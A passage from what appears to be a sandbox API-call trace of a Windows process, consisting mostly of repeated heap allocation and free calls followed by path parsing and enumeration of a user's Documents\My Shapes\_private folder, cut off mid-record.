Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.172] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.172] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.173] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.174] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.175] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.176] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.176] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.177] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.177] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.178] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.178] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.183] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.183] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.183] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.183] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.183] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.184] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.184] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ec78 [0172.185] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.185] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0172.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0172.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0172.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.186] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.186] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.186] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.186] PathFindFileNameW (pszPath="") returned="" [0172.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.244] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ec78 | out: hHeap=0xcd0000) returned 1 [0172.244] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.244] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2, 